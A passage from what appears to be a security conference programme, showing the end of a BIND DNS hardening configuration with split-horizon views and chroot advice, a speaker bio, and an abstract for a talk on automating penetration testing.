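    version "not disclosed";          // do not advertise the BIND version to remote fingerprinting
    allow-transfer { none; };         // no zone transfers unless a zone says otherwise
    allow-recursion { internal; };    // recursion only for our own clients
};

// Split horizon: internal clients see the internal zone data and get
// recursion; everyone else sees only the public records and gets none.
view "internal" {
    match-clients { internal; };
    allow-query { internal; };
    recursion yes;
    zone "example.com" {
        type master;
        file "internal/example.com.zone";
        allow-transfer { 192.0.2.2; };
    };
};

view "external" {
    match-clients { any; };
    allow-query { any; };
    recursion no;
    zone "example.com" {
        type master;
        file "external/example.com.zone";
        allow-transfer { 198.51.100.2; };
    };
};
```

Once views are in use every zone, the root hints included, must live inside a view. For the chroot step, start the daemon as an unprivileged user with a chroot directory, for example `named -u named -t /var/named-chroot`, after copying the configuration, zone files and the device nodes it needs (/dev/null, /dev/random) into that directory; a compromise of named then lands in a directory tree that holds nothing but zone data.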

Jay Beale is the Security Team Director at MandrakeSoft, makers of Mandrake Linux. He is also the Lead Developer of the Bastille Linux Project, which creates a hardening program for Linux.  Jay is the author of a number of articles on Unix/Linux security, along with the upcoming book Securing Linux the Bastille Way, to be published by Addison-Wesley. You can learn more about his articles, talks and favorite security links via www.bastille-linux.org/jay.


Iván Arce, Founder and CTO of CORE-SDI
Max Caceres, Head Engineer, Corelabs, CORE-SDI

Automated Penetration Testing

Penetration tests have become a common practice in the information security industry during the past decade. However, it is still a very immature practice in terms of professionalism, methodology and quality. Automating the penetration test practice will bring it to a new level of quality and trustworthiness, but attempts to do so will face interesting technical challenges. This is perhaps a new challenge for the IS industry in the coming years. In our talk we attempt to clarify and define the penetration test practice as it is now. We then proceed to identify current flaws and conclude that automating the practice might solve many of them. Finally we describe the technical difficulties we face in doing so and a possible way to address them.

Ivan Arce, Founder and CTO of
